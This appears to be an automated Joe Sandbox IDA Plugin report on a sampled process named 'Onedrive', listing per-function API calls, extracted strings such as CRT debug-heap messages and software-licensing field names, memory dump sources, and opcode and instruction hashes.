                                                    • Instruction ID: 58fe5081600924ae890da09d2331276513a441b5b2456aaf18470d9c6e08fb59
                                                    • Opcode Fuzzy Hash: de347effb7d31f4abd0a984043735bca1e7089a22e8b78f18e1b4c452233c240
                                                    • Instruction Fuzzy Hash: 95511A60B0DB5B82FE14D7A6E8905B51691AFB9784F405031EA0EDB396EE6CF50CB730
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: new[]
                                                    • String ID: %ls$Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtIsValidHeapPointer(block)$__acrt_first_block == old_head$__acrt_last_block == old_head$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$old_head->_line_number == line_number_for_ignore_blocks && old_head->_request_number == request_number_for_ignore_blocks$reallocation_is_allowed || (!reallocation_is_allowed && new_head == old_head)
                                                    • API String ID: 4059295235-458177602
                                                    • Opcode ID: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                                    • Instruction ID: f157aeb2a1900539a179eabaf2b32d8dbe84aac806843b1fb360491aae64459f
                                                    • Opcode Fuzzy Hash: b5581433664bbf5574ad46b3204ba3e9f57dab964faa428365c5c575a416aa92
                                                    • Instruction Fuzzy Hash: A1322036B0CB8585E760CB16E460B6A77A1FB88790F514135DAAD9BBE8DF3CD580CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: FreeHeap$Local$Process$AllocCloseInformationLicensingOpenStatus
                                                    • String ID: UXDifferentiator
                                                    • API String ID: 3977053813-2471664420
                                                    • Opcode ID: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                                    • Instruction ID: b75ab6efe7fcd7c738d06fecb199493bcbb8b8b6b7d6033096ce6d9a4b5f867a
                                                    • Opcode Fuzzy Hash: 9044375e2e7989267fff8dfc678b0600364f32c011c0966404f9a2e3441f9e71
                                                    • Instruction Fuzzy Hash: F7A16D32A08B428AEB118FA1E4403BD7BB1FBA9798F144535EE0E97754DF38E4499760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Free$Process$ErrorLast$FileLibrarySetup$CloseDirectoryLoadOpenSystem
                                                    • String ID: TapiCodes$tapiGetLocationInfo
                                                    • API String ID: 3084871228-3986397507
                                                    • Opcode ID: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                                    • Instruction ID: 1c604f90dea9df7f1836d97472bf17bfd26903443179acbc6a2c392f0519afb8
                                                    • Opcode Fuzzy Hash: 624e032ff8f8052b215d109ab565f33b61593328c3df89e529d95a6be9fd6c6c
                                                    • Instruction Fuzzy Hash: 5B517221B18A8286FB149FA2A4002B967A0FFB5B95F459135FD1ED7784DF3CE4099720
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Container_base12Container_base12::~_std::_$FileFind$Concurrency::details::_FirstNextSchedulerScheduler::__wcsupr_stype_info::_name_internal_method
                                                    • String ID:
                                                    • API String ID: 1493447076-0
                                                    • Opcode ID: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                                    • Instruction ID: 37243d04dc8eac2e32c91ebe9f9b52a20ae997987db00a0c17f5df5904415266
                                                    • Opcode Fuzzy Hash: cc861cbe94f13b17584c7a37f6fbde71b82270591c4d13bf4b386e749a55bb7e
                                                    • Instruction Fuzzy Hash: 75B12E2671CBC181DB60DB26E4A07AEB364FBC4780F510132E69D9AAE9DF2DD5458B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$Client hook free failure.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_free()$_CrtIsValidHeapPointer(block)$__acrt_first_block == header$__acrt_last_block == header$header->_block_use == block_use || header->_block_use == _CRT_BLOCK && block_use == _NORMAL_BLOCK$header->_line_number == line_number_for_ignore_blocks && header->_request_number == request_number_for_ignore_blocks$is_block_type_valid(header->_block_use)$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp
                                                    • API String ID: 0-3956125450
                                                    • Opcode ID: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                                    • Instruction ID: 0723cca30eb7500c637c1cf5095e53ffa094dcf474caecfdd6148edf84a6d2bd
                                                    • Opcode Fuzzy Hash: 42c07789950f123e8db84fb944ed052ae9ea2649d9af8cc015498c765690b2ed
                                                    • Instruction Fuzzy Hash: 7322303670CB4586E760CB56E4A0B6AB7A4FB88790F510136DA9D9BBACDF7CD540CB00
                                                    APIs
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18E6B
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18E80
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EA1
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EB6
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18ED7
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18EEC
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F0D
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F22
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F43
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F58
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F79
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18F8E
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18FAF
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA18FC4
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                                    • Instruction ID: 676fdc8cb819839ad0d99d3906633270899561c3c4195fc1e97a5ef16ce072b1
                                                    • Opcode Fuzzy Hash: cae523c6d732ae3a046b12cbb7a892b6bb2d1f35e030631837f27fb96ec666e9
                                                    • Instruction Fuzzy Hash: 6C41C922A04A4297EB04AB62D5483BDABE0FF7DB49F898575D70E96355CF3CE0189360
                                                    APIs
                                                    • memset.MSVCRT ref: 00007FF63EA1C821
                                                      • Part of subcall function 00007FF63EA1DD74: GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1DEB2
                                                      • Part of subcall function 00007FF63EA1DD74: HeapFree.KERNEL32(?,?,00000000,00007FF63EA1C831), ref: 00007FF63EA1DEC6
                                                      • Part of subcall function 00007FF63EA1D98C: GetProcessHeap.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1DA5B
                                                      • Part of subcall function 00007FF63EA1D98C: HeapFree.KERNEL32(?,?,?,00000000,?,?,?,00007FF63EA1C83D), ref: 00007FF63EA1DA6F
                                                      • Part of subcall function 00007FF63EA1D98C: GetProcessHeap.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1DA90
                                                      • Part of subcall function 00007FF63EA1D98C: HeapFree.KERNEL32(?,?,?,00000000), ref: 00007FF63EA1DAA4
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA1C9B9
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA1C9CD
                                                      • Part of subcall function 00007FF63EA1CD40: _wcsicmp.MSVCRT ref: 00007FF63EA1CDA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess$_wcsicmpmemset
                                                    • String ID: GraceEndDate$KernelTimebombDate$LastConsumptionReason$LastValidationError$LicenseExpirationDate$PartialProductKey$ProductKeyType$SkuId
                                                    • API String ID: 1329376875-3221521310
                                                    • Opcode ID: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                                    • Instruction ID: 0dd98442fcb35598de89274a727c7e404b0fe4b1173a53a76fc6706edc435f51
                                                    • Opcode Fuzzy Hash: 886d2079de2440a1dc17ccb1289c6ba122f9246d015c5aedb6db7103f639f3d0
                                                    • Instruction Fuzzy Hash: D5512E61B08B1355FB049BE5C8921FC27A1AF65788F804431EA0DD7B96EF79E50DD360
                                                    APIs
                                                    • CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17B76
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17C3A
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17C54
                                                    • memset.MSVCRT ref: 00007FF63EA17C7A
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17CE9
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17CFE
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17D76
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17D8B
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17E03
                                                    • HeapAlloc.KERNEL32(?,?,?,?,00000000,00000002,?,00000000,?,00007FF63EA11653), ref: 00007FF63EA17E18
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcess$CreateInstancememset
                                                    • String ID:
                                                    • API String ID: 2970048943-0
                                                    • Opcode ID: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                                    • Instruction ID: 48664def56808e8175afc753380db8d5e2e8c79f988d285a0b8d7d23c6919eeb
                                                    • Opcode Fuzzy Hash: 2d6941d3c3f96ca2edc9991dc4b88ee1e50cea78047afc8d96a8f69007c24f62
                                                    • Instruction Fuzzy Hash: 6AC16F32B18B8282EB04DB66D8401B937E4FB79B847519635EE4D93751EF3CE598D310
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164C0
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164D5
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164F2
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16507
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16524
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16539
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16556
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1656B
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16588
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1659D
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165CD
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165E1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                                    • Instruction ID: 76b90fc7a0894eae2ff9a0a5c79b5f49a933c9ad613c81e5c93ecacb64324d21
                                                    • Opcode Fuzzy Hash: 15737396d7e36de835ef5cf2251aab48bcf9544a645884e82e969f2fc5883780
                                                    • Instruction Fuzzy Hash: 13416432A04B85C6EB049F61A1441B9BBA0FFBDB85B498175EA4E97319DF3CD049D710
                                                    APIs
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19425
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19439
                                                      • Part of subcall function 00007FF63EA193FC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19460
                                                      • Part of subcall function 00007FF63EA193FC: HeapFree.KERNEL32(?,?,?,00007FF63EA18E62,?,?,00000000,00007FF63EA18CA3), ref: 00007FF63EA19474
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18CFF
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D14
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D35
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D4A
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D6B
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18D80
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DA1
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DB6
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DD7
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18DEC
                                                    • GetProcessHeap.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18E0D
                                                    • HeapFree.KERNEL32(?,?,00000000,00007FF63EA18CAD), ref: 00007FF63EA18E22
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: bf1518c68518747d8e75550e0073bb1ebe2d32fc955a20064eca9f5bcd791406
                                                    • Instruction ID: ab37782657529cd7cc365bbdec97a582977f486bf90e1c3de67679ee3e6b8aea
                                                    • Instruction Fuzzy Hash: 5641FE22A04A42D7EB049B6291483BDABE0FF7DB49F498575D70E87745DF3CD0189360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: PointerValidswprintf
                                                    • String ID: #File Error#(%d) : $%hs(%d) : $Dumping objects ->$client block at 0x%p, subtype %x, %Iu bytes long.$crt block at 0x%p, subtype %x, %Iu bytes long.$normal block at 0x%p, %Iu bytes long.${%ld}
                                                    • API String ID: 2867872725-2254558347
                                                    • Opcode ID: e0d5ac88001468575471fabc83286a0951fb7053397fe8767a2cadde61e4fbc8
                                                    • Instruction ID: a7ea70d1ab41d4f9b930e80c9655c23b008019acb90feff70685a33ec3c546dc
                                                    • Instruction Fuzzy Hash: D0C13D36718B8586E760DB17E4A1B6A73A0FB85750F114131EA9D9BBADDF3DD4408B00
                                                    APIs
                                                      • Part of subcall function 00007FF63EA1A33C: SLOpen.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A37E
                                                      • Part of subcall function 00007FF63EA1A33C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A5F9
                                                      • Part of subcall function 00007FF63EA1A33C: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A60D
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A622
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A63C
                                                      • Part of subcall function 00007FF63EA1A33C: LocalFree.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A656
                                                      • Part of subcall function 00007FF63EA1A33C: SLClose.SLC(?,?,?,?,?,?,?,00000000), ref: 00007FF63EA1A670
                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A00D
                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A022
                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF63EA1704B), ref: 00007FF63EA1A036
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                     • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Free$HeapLocal$Process$CloseOpen
                                                    • String ID: Kernel-ExpirationDate
                                                    • API String ID: 3289953759-555650421
                                                    • Opcode ID: ec37c195baf8c0247c0ae37d5ff26c1606d082038a14728f8d7ed840f1ddf7a0
                                                    • Instruction ID: 131cd68b3ce758d8af6f3dd657b4ae4bfcc114d1c68ac96aeac0c57527d19790
                                                    • Instruction Fuzzy Hash: 79B19032A0CB528AE7218FA1D4006BD67A5FF69784F159139EE4F97780DF38E489E710
                                                    APIs
                                                    • __vcrt_lock.LIBVCRUNTIMED ref: 00007FFDF3AECA2E
                                                      • Part of subcall function 00007FFDF3AF6620: EnterCriticalSection.KERNEL32(?,?,?,?,00007FFDF3AE8375,?,?,?,?,00007FFDF3AE8062), ref: 00007FFDF3AF6641
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                     • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmp
                                                     • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterSection__vcrt_lock
